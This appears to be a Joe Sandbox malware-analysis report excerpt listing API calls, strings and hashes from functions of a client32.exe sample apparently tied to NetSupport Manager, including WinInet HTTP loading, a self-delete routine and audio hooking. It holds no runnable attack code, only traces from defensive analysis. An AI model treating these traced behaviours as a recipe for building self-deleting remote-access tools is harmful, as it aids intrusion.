SelectClipRgn.GDI32(?,00000000), ref: 110079E0
DeleteObject.GDI32(00000000), ref: 110079ED
DeleteDC.GDI32(?), ref: 110079FA
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
ReleaseDC.USER32(?,?), ref: 11007A46
CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
CreateSolidBrush.GDI32(?), ref: 11007B42
GetSysColor.USER32(00000004), ref: 11007B50
LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67

Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

_memset.LIBCMT ref: 11007BC7
_swscanf.LIBCMT ref: 11007C34

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

CreateFontIndirectA.GDI32(?), ref: 11007C65
_memset.LIBCMT ref: 11007C8C
GetStockObject.GDI32(00000011), ref: 11007C9F
GetObjectA.GDI32(00000000), ref: 11007CA6
CreateFontIndirectA.GDI32(?), ref: 11007CB3
GetWindowRect.USER32(?,?), ref: 11007DF6
SetWindowTextA.USER32(?,00000000), ref: 11007E33
GetSystemMetrics.USER32(00000001), ref: 11007E53
GetSystemMetrics.USER32(00000000), ref: 11007E70
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
SelectObject.GDI32(?,00000000), ref: 11007986

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5

UpdateWindow.USER32(?), ref: 11007EF2
SetCursor.USER32(?), ref: 11007EFF

Strings

PenColour, xrefs: 11007A82
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11007807, 11007A29, 11007DD9, 11007E1C, 11007E9A, 11007EDC
Monitor, xrefs: 11007857
Annotate, xrefs: 11007A6F, 11007A87, 11007AB2, 11007ADB, 11007AFA, 11007BA6
Show, xrefs: 1100785C, 110078EF
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11007C2E
m_hWnd, xrefs: 1100780C, 11007A2E, 11007DDE, 11007E21, 11007E9F, 11007EE1
FillColour, xrefs: 11007AD6
Tool, xrefs: 11007A6A
ShowAppIds, xrefs: 110078EA
Font, xrefs: 11007BA1
FillStyle, xrefs: 11007AEC
PenWidth, xrefs: 11007A9E
DISPLAY, xrefs: 1100794E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2635354838-2303488826
Opcode ID: 8f37e2ee36975e3a5ac61f12557502569830dc9db571618f2aa350f76615224c
Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
Opcode Fuzzy Hash: 8f37e2ee36975e3a5ac61f12557502569830dc9db571618f2aa350f76615224c
Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50

Function 11029BB0 Relevance: 84.5, APIs: 36, Strings: 12, Instructions: 534libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WinInet.dll,B6DE5DE1,74DF23A0,?,00000000), ref: 11029BE5
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
SetLastError.KERNEL32(00000078), ref: 11029C93
_malloc.LIBCMT ref: 11029CB7
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
GetLastError.KERNEL32 ref: 11029CF2
_free.LIBCMT ref: 11029CFE
_malloc.LIBCMT ref: 11029D07
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
SetLastError.KERNEL32(00000078), ref: 11029D84
SetLastError.KERNEL32(00000078), ref: 11029D91
SetLastError.KERNEL32(00000078), ref: 11029D9B
_free.LIBCMT ref: 11029DA5

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
SetLastError.KERNEL32(00000078), ref: 11029E3E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
SetLastError.KERNEL32(00000078), ref: 11029EA3
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
SetLastError.KERNEL32(00000078), ref: 1102A150
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
SetLastError.KERNEL32(00000078), ref: 1102A1B9
FreeLibrary.KERNEL32(?), ref: 1102A1CA

Strings

InternetErrorDlg, xrefs: 11029FC0
InternetQueryDataAvailable, xrefs: 1102A07D
InternetConnectA, xrefs: 11029E4B
WinInet.dll, xrefs: 11029BDD
InternetCloseHandle, xrefs: 11029C79, 11029E1F, 11029E84, 1102A19C
HttpQueryInfoA, xrefs: 11029F63
://, xrefs: 11029DC5
InternetOpenA, xrefs: 11029D55
HttpOpenRequestA, xrefs: 11029EC3
InternetQueryOptionA, xrefs: 11029CCB, 11029D1B
GET, xrefs: 11029EE9
HttpSendRequestA, xrefs: 11029F17

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$FreeLibrary_free_malloc$HeapLoad
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 475159930-913974648
Opcode ID: b5eba41c70c6c87f222b6dd1055e24ebaaac7f7d97e8991091279eea7195b612
Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
Opcode Fuzzy Hash: b5eba41c70c6c87f222b6dd1055e24ebaaac7f7d97e8991091279eea7195b612
Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60

Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11127400
_memset.LIBCMT ref: 1112741D
GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
_strrchr.LIBCMT ref: 111274AA
CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
wsprintfA.USER32 ref: 11127561
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
_strrchr.LIBCMT ref: 111276AB
_memmove.LIBCMT ref: 11127724
GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744

Strings

*.*, xrefs: 111276E6
iCodeSize <= sizeof(local.opCodes), xrefs: 1112770A
pSlash, xrefs: 111276C1
D, xrefs: 11127413
explorer.exe, xrefs: 111275D9
selfdelete.cpp, xrefs: 111276BC, 11127705
NSelfDel.exe, xrefs: 1112746A
"%s" %d %s, xrefs: 1112755B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
API String ID: 2219718054-800295887
Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55

Function 1102D9CA Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 295sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,?,?,?,?,00000003), ref: 1102DAA8

Strings

*.*, xrefs: 1102DF43
Finished terminate, xrefs: 1102E0B6
pSlash, xrefs: 1102DF34
8zi, xrefs: 1102D9DD, 1102D9F7, 1102DA4D, 1102DA83, 1102DA91, 1102DAB8, 1102DFCA, 1102DFE8, 1102DFFA
CLIENT32.CPP, xrefs: 1102DF2F
Unload Hook, xrefs: 1102DAAE
Audio, xrefs: 1102DADE
Error %s unloading audiocap dll, xrefs: 1102DE66
Stop tracing, almost terminated, xrefs: 1102E058
HookDirectSound, xrefs: 1102DAD9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: *.*$8zi$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Finished terminate$HookDirectSound$Stop tracing, almost terminated$Unload Hook$pSlash
API String ID: 3472027048-2747415311
Opcode ID: f0c6255829a39928dd45565b2c458817ab662a845ff5a4452146d644dca208ea
Instruction ID: 7e1892b90d14cce8794dca3a86e1a29acb3f7f1d98b6f628baf4469e349b85e3
Opcode Fuzzy Hash: f0c6255829a39928dd45565b2c458817ab662a845ff5a4452146d644dca208ea
Instruction Fuzzy Hash: 17B10274E422269FE712DFE0CCC4F6DB7A5AB84B0CF5001B8E62697288D7716D84CB52

Function 1102DD21 Relevance: 38.8, APIs: 14, Strings: 8, Instructions: 269COMMON

Download Yara Rule

APIs

Part of subcall function 11110980: DeleteCriticalSection.KERNEL32(?,B6DE5DE1,?,?,?,?,00000000,Function_0018B2A8,000000FF,?,11072BCA,?,111EE124,111CD988), ref: 111109CA
Part of subcall function 11110980: EnterCriticalSection.KERNEL32 ref: 11110A15
Part of subcall function 11110980: SetEvent.KERNEL32(000002A8), ref: 11110A3E
Part of subcall function 11110980: CloseHandle.KERNEL32(000002A8), ref: 11110A72
Part of subcall function 11110980: WaitForSingleObject.KERNEL32(00000274,000000FF), ref: 11110A80
Part of subcall function 11110980: CloseHandle.KERNEL32(00000274), ref: 11110A8D

CloseHandle.KERNEL32(00000280), ref: 1102DDE5
_free.LIBCMT ref: 1102DDF5
_free.LIBCMT ref: 1102DE11
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102DEA4
GetFileAttributesA.KERNEL32(?), ref: 1102DEB1

Part of subcall function 11110980: LeaveCriticalSection.KERNEL32(111F18F0), ref: 11110ACE

Strings

*.*, xrefs: 1102DF43
Finished terminate, xrefs: 1102E0B6
pSlash, xrefs: 1102DF34
8zi, xrefs: 1102DFCA, 1102DFE8, 1102DFFA
CLIENT32.CPP, xrefs: 1102DF2F
delete gMain.ev, xrefs: 1102DDB2
Error %s unloading audiocap dll, xrefs: 1102DE66
Stop tracing, almost terminated, xrefs: 1102E058

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$File_free$AttributesDeleteEnterEventLeaveModuleNameObjectSingleWait
String ID: *.*$8zi$CLIENT32.CPP$Error %s unloading audiocap dll$Finished terminate$Stop tracing, almost terminated$delete gMain.ev$pSlash
API String ID: 3417509300-100642519
Opcode ID: 85d3bc05d589da7f4618f3680e719a62a0d88f87dc6ecc94d679b8e248aa7901
Instruction ID: 0e6676596d11f696c3f87db48ea27dc4e8c36bb533281e49d44f9be841bf80ec
Opcode Fuzzy Hash: 85d3bc05d589da7f4618f3680e719a62a0d88f87dc6ecc94d679b8e248aa7901
Instruction Fuzzy Hash: B391FF74E016369FE705EFE0CCC4FADB7A5AB8470CF5001B8E52697288E771A984CB52

Function 1103BA70 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 196fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103BAC2
GetUserNameA.ADVAPI32(?,?), ref: 1103BAE9

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

DeleteFileA.KERNEL32(?), ref: 1103BB4A
_sprintf.LIBCMT ref: 1103BBCB
_fputs.LIBCMT ref: 1103BC40
GetFileAttributesA.KERNEL32(?), ref: 1103BCB1
_free.LIBCMT ref: 1103BC46

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

SetFileAttributesA.KERNEL32(?,00000000), ref: 1103BCEF

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

Strings

%05d, xrefs: 1103BBC1
IsA(), xrefs: 1103BB36, 1103BB6E, 1103BC9D, 1103BCD7
\Rewards.bin, xrefs: 1103BB01
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103BB31, 1103BB69, 1103BC98, 1103BCD2
P, xrefs: 1103BADF
8zi, xrefs: 1103BA9F, 1103BD07

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
String ID: %05d$8zi$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 383231468-3525248188
Opcode ID: cf822c7198dba2e3e27f6f84e937a900cb9203ffc2044b4696fabe1147a4536a
Instruction ID: dda3550dde52e5958fde777031409836e30383fefd9917481d076e1c62cf06fb
Opcode Fuzzy Hash: cf822c7198dba2e3e27f6f84e937a900cb9203ffc2044b4696fabe1147a4536a
Instruction Fuzzy Hash: 3E71B235D0462E9FDB25CB64CC54FEEB3B5AF55308F0401D9E41A67284EB71AA44CF90

Function 11025A90 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 384windowtimeCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11025C27
DrawMenuBar.USER32(?), ref: 11025C3E
GetMenu.USER32(?), ref: 11025C93
DeleteMenu.USER32(00000000,00000001,00000400), ref: 11025CA1
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 11025BFE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

UpdateWindow.USER32(?), ref: 11025CE7
IsIconic.USER32(?), ref: 11025CFA
SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 11025D1A
KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 11025D80

Strings

Chat, xrefs: 11025AB8
..\ctl32\chatw.cpp, xrefs: 11025AEA
m_hWnd, xrefs: 11025CD6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11025CD1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3085788722-363603473
Opcode ID: 98f8c1f83795b2d2db28a8cc6ab060891feeb056a2029c3e5b65f8357af9b974
